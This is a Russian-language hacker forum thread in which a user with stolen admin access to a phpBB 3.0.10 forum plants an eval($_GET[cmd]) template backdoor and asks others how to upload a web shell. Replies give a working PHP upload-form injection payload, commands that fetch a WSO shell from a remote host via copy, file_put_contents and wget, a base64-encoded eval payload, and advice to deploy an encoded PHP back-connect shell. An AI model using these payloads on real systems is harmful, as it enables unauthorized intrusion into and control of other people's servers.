phpBB 3.0.10 Помогите залить шелл

Discussion in 'Песочница' started by Hapk, 29 Mar 2013.

  1. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    В общем есть доступ в админку
    пробую залить шелл через правку шаблона
    вставляю код <!-- PHP --> eval($_GET[cmd]); <!-- ENDPHP -->
    проверяю site.ru/forum/index.php?cmd=phpinfo(); - Работает
    А вот когда пытаюсь залить шелл он почему то не заливается
    делаю вот так site.ru/forum/index.php?cmd=$url=$_GET;$content= file_get_contents($url);...ничку подскажите как ещё я могу залить шелл
     
  2. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    941
    Likes Received:
    523
    Reputations:
    173
     
  3. Evil_Genius

    Evil_Genius Member

    Joined:
    3 Aug 2009
    Messages:
    519
    Likes Received:
    15
    Reputations:
    -4
    Попробуй так:
    site.ru/forum/index.php?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>

    шелл будет лежать site.ru/forum/название_закачиваемого_файла.php
     
  4. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    да просто всегда так заливал!

    copy("http://сайт/wso.txt","2.php"); - не работает

    file_put_contents('2.php', file_get_contents('http://сайт/wso.txt')); - не работает

    и это тоже не работает
    ?cmd=system("cd /home/sait.ru/www; wget http://сайт/wso.txt");
    далее
    ?cmd=system("cd /home/sait.ru/www; mv wso.txt wso.php");
     
  5. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    941
    Likes Received:
    523
    Reputations:
    173
    eval(base64_decode (Y29weSgiaHR0cDovL9GB0LDQudGCL3dzby50eHQiLCIyLnBocCIpOw))%3b ??


    Да быть такого не может чтобы через wget не заливалось...
     
    #5 OxoTnik, 29 Mar 2013
    Last edited: 29 Mar 2013
  6. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    Не много тебя не до понял
    site.ru/forum/название_закачиваемого_файла.php
    а где мне название это написать?
     
  7. Evil_Genius

    Evil_Genius Member

    Joined:
    3 Aug 2009
    Messages:
    519
    Likes Received:
    15
    Reputations:
    -4
    закачиваешь файл под названием file.php - у тебя такое и буде название site.ru/forum/file.php
     
  8. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5

    Так тоже не работает((
     
  9. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    941
    Likes Received:
    523
    Reputations:
    173
    так ты запрос изменил под себя я надеюсь :D ?

    Если что в личку кинь, посмотрю
     
  10. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    я когда вот так делаю

    site.ru/forum/index.php?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>

    у меня нечего не происходит
     
  11. Evil_Genius

    Evil_Genius Member

    Joined:
    3 Aug 2009
    Messages:
    519
    Likes Received:
    15
    Reputations:
    -4
    Тут по идее должна гдето вылезти форма с закачивание файла и кнопкой "Обзор".
     
  12. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    941
    Likes Received:
    523
    Reputations:
    173
    я видел тут несколько людей с экстрасенсорными способностями, только они оффлайн... phpinfo кинь...
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    скинь директивы пхпинфо сюда

    disabled_functions, safe_mode, allow_url_fopen и тп..

    проверь папку на вритабельность, запиши сначала шелл в тмп, попробуй инклудить

    возможно mq включено, используй stripslashes в бекдоре

    2 Охотник

    string base64_decode ( string $data [, bool $strict = false ] )

    ponel?
     
    _________________________
    1 person likes this.
  14. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    блин просто не увидел форму для загрузки файлов
    но когда попробовал залить через неё у меня он походу не залился не фига
     
  15. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    вот небольшой кусок phpinfo
    Directive Local Value Master Value
    allow_call_time_pass_reference Off Off
    allow_url_fopen On On
    allow_url_include Off Off
    always_populate_raw_post_data Off Off
    arg_separator.input & &
    arg_separator.output & &
    asp_tags Off Off
    auto_append_file no value no value
    auto_globals_jit On On
    auto_prepend_file no value no value
    browscap no value no value
    default_charset no value no value
    default_mimetype text/html text/html
    define_syslog_variables Off Off
    detect_unicode On On
    disable_classes no value no value
    disable_functions no value no value
    display_errors Off Off
    display_startup_errors Off Off
    doc_root no value no value
    docref_ext no value no value
    docref_root no value no value
    enable_dl On On
    error_append_string no value no value
    error_log no value no value
    error_prepend_string no value no value
    error_reporting 6135 0
    expose_php On On
    extension_dir /usr/local/lib/php/20060613 /usr/local/lib/php/20060613
    file_uploads On On
    highlight.bg #FFFFFF #FFFFFF
    highlight.comment #FF8000 #FF8000
    highlight.default #0000BB #0000BB
    highlight.html #000000 #000000
    highlight.keyword #007700 #007700
    highlight.string #DD0000 #DD0000
    html_errors On On
    ignore_repeated_errors Off Off
    ignore_repeated_source Off Off
    ignore_user_abort Off Off
    implicit_flush Off Off
    include_path .:/usr/local/share/pear .:/usr/local/share/pear
    log_errors On On
    log_errors_max_len 1024 1024
    magic_quotes_gpc On On
    magic_quotes_runtime Off Off
    magic_quotes_sybase Off Off
    mail.force_extra_parameters no value no value
    max_execution_time 90 90
    max_file_uploads 20 20
    max_input_nesting_level 64 64
    max_input_time 60 60
    memory_limit 192M 192M
    open_basedir /home/www/site.ru/public_html/:/var/tmp/:/tmp/ no value
    output_buffering 4096 4096
    output_handler no value no value
    post_max_size 100M 100M
    precision 14 14
    realpath_cache_size 16K 16K
    realpath_cache_ttl 120 120
    register_argc_argv Off Off
    register_globals Off Off
    register_long_arrays Off Off
    report_memleaks On On
    report_zend_debug On On
    safe_mode Off Off
    safe_mode_exec_dir no value no value
    safe_mode_gid Off Off
    safe_mode_include_dir no value no value
    sendmail_from no value no value
    sendmail_path /usr/sbin/sendmail -t -i /usr/sbin/sendmail -t -i
    serialize_precision 100 100
    short_open_tag On On
    SMTP localhost localhost
    smtp_port 25 25
    sql.safe_mode Off Off
    suhosin.log.phpscript 0 0
    suhosin.log.phpscript.is_safe Off Off
    suhosin.log.phpscript.name no value no value
    suhosin.log.sapi no value no value
    suhosin.log.script no value no value
    suhosin.log.script.name no value no value
    suhosin.log.syslog no value no value
    suhosin.log.syslog.facility no value no value
    suhosin.log.syslog.priority no value no value
    suhosin.log.use-x-forwarded-for Off Off
    track_errors Off Off
    unserialize_callback_func no value no value
    upload_max_filesize 100M 100M
    upload_tmp_dir no value no value
    user_dir no value no value
    variables_order GPCS GPCS
    xmlrpc_error_number 0 0
    xmlrpc_errors Off Off
    y2k_compliance On On
    zend.ze1_compatibility_mode Off Off
     
  16. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    Проблема не решена((
    Кто ещё чем может помочь?
     
  17. sova1611

    sova1611 New Member

    Joined:
    10 Jan 2009
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    скорее всего прав не хватает,попробуй в другую диру залится
     
  18. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    много папок перепробовал
    но без результатно
     
  19. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,788
    Likes Received:
    872
    Reputations:
    859
    Сдаётся мне что вам попался хорошо настроенный сервер.

    Можете радоваться - сорвали ДжекПот ! )

    Однако, решение есть - и оно у всех на виду.

    1) Шаг первый - ищем бэкконект на php (2кб).
    2) Шаг второй - base64encode()
    3) Шаг третий - eval(base64decode(backconnect))
     
    _________________________
  20. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    Однако я не очень это понял(( в icq ответь
    или объясни здесь по подробней
     
Loading...